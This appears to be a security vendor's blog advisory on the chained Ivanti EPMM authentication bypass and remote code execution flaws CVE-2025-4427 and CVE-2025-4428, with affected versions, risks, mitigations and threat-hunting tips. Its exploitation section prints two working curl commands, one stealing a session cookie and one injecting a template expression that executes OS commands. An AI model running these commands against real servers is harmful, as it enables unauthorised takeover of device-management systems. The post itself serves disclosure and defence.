Go back to All Blog posts

Exploited! Ivanti EPMM Authentication Bypass & Remote Code Execution (CVE-2025-4427 & CVE-2025-4428)

Amit Sheps
Amit Sheps Director of Product Marketing LinkedIn
May 18, 2025

Ivanti’s Endpoint Manager Mobile (EPMM, formerly MobileIron Core) just delivered an unpleasant one-two punch to defenders. Two fresh vulnerabilities—an authentication bypass (CVE-2025-4427) and an API-level remote-code-execution flaw (CVE-2025-4428)—can be chained to grant unauthenticated attackers full command execution on affected servers. Both issues are already being exploited in the wild, making rapid remediation essential.

What Are CVE-2025-4427 & CVE-2025-4428 Ivanti EPMM Vulnerabilities?

CVE-2025-4427 – API Authentication Bypass
A logic flaw in the /mifs REST API incorrectly validates session tokens, letting remote, unauthenticated users reach endpoints that should be gated behind login. CVSS 3.1 base: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A: N).

CVE-2025-4428 – Authenticated Remote Code Execution
Once on an API endpoint, attackers can pass malicious server-side template expressions that Hibernate Validator processes inside a Spring bean. Unsafe evaluation leads to arbitrary command execution as the tomcat user. CVSS 3.1 base: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Affected versions (best public data) – anything ≤ 12.5.0.0 as well as the 11.x and 12.3/12.4 maintenance branches:

  • 11.12.0.4  and older
  • 12.3.0.1   and older
  • 12.4.0.1   and older
  • 12.5.0.0   and older

Fixed builds: 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1.

Exploiting the Vulnerability Chain

Because CVE-2025-4428 requires an authenticated session, threat actors first abuse CVE-2025-4427 to grab an unlocked API cookie. The most reliable path so far targets /mifs/admin/ endpoints:

bash

CopyEdit

# 1. Steal a session cookie via auth-bypass

curl -isk "https://<target>/mifs/admin/heartbeatCheck" \

     -H "Accept: application/json" \

     | grep 'Set-Cookie: ZSESSIONID' | cut -d';' -f1

With that cookie, attackers send a malicious payload using WatchTower’s disclosed endpoint:

bash

CopyEdit

# 2. Trigger SSTI to achieve RCE

curl -isk "https://<target>/mifs/admin/rest/api/v2/featureusage" \

     -H "Cookie: ZSESSIONID=<stolen>" \

     -H "Content-Type: application/json" \

     -d '{"expr":"${T(java.lang.Runtime).getRuntime().exec(\"id\") }"}'

If successful, the response body leaks the command output—proof that the server executed arbitrary OS commands.

Why this chain matters: CVE-2025-4427 on its own “only” reveals limited configuration details. But once combined with CVE-2025-4428, the attacker instantly upgrades to pre-auth RCE, bypassing every control EPMM’s UI appears to enforce.

Potential Risks

  • Data exposure – EPMM holds device inventory, security posture, and MDM certificates that can unlock corporate mobile fleets.
  • Lateral pivot – Running arbitrary commands on the host lets attackers scrape credentials, drop web-shells, or tunnel deeper into the network.
  • Mobile device takeover – With administrator-level EPMM access, threat actors can push malicious configs/apps to every enrolled phone.
  • Compliance breach – Abuse of MDM infrastructure jeopardises GDPR, PCI-DSS, and ISO 27001 controls for secure mobile management.
  • Ransomware precursor – RMM/MDM servers are prime footholds for staging mass-scale encryption of endpoints.

Mitigation Steps

  1. Patch Immediately
    • Apply Ivanti’s fixed builds (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) from the official advisory.
  2. Temporary Work-arounds (if upgrade is delayed)
    • Restrict /mifs and /mifs/admin paths at the load-balancer or WAF to internal IP ranges only.
    • Enable two-factor admin login; CVE-2025-4427 cannot circumvent MFA on interactive UIs but avoidable entirely by blocking unauthenticated API calls.
  3. Harden Server-Side Expression Handling
    • If custom validation logic exists, set hibernate.validator.expressionLanguage to none in application.properties to disable EL evaluation.
  4. Threat Hunt & Forensics
    • Search web-server logs for requests to /featureusage or unusual heartbeatCheck, licenseCheck, and getState API calls.
    • Scan for new .jsp, .war, or .class files in ${EPMM_HOME}/tomcat/webapps/.
  5. Continuous Validation with IONIX
    • Use the IONIX Exposure Management Platform to validate exploitability across Internet-facing hosts and prioritise RCE chains that truly work in your environment.

Am I Impacted by CVE-2025-4427 and CVE-2025-4428?

IONIX is actively tracking these vulnerabilities. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.

References

  • NVD entries for CVE-2025-4427 & CVE-2025-4428
  • Tenable Research advisory
  • watchTowr Labs deep dive & PoC
  • Rapid7 exploit-in-the-wild analysis
  • The Hacker News coverage of patch & PoC

WATCH A SHORT IONIX DEMO

See how easy it is to implement a CTEM program with IONIX. Find and fix exploits fast.

THE LATEST FROM IONIX

Amit Sheps
May 22, 2025
Exploited! Grafana CVE-2025-4123 – Open Redirect & Stored XSS Give Attackers a Springboard Into Your Cloud
Learn more
Amit Sheps
May 18, 2025
Exploited! Ivanti EPMM Authentication Bypass & Remote Code Execution (CVE-2025-4427 & CVE-2025-4428)
Learn more
Amit Sheps
May 15, 2025
PCI DSS 4.0 Compliance Guide: From Confusion to Confidence    
Learn more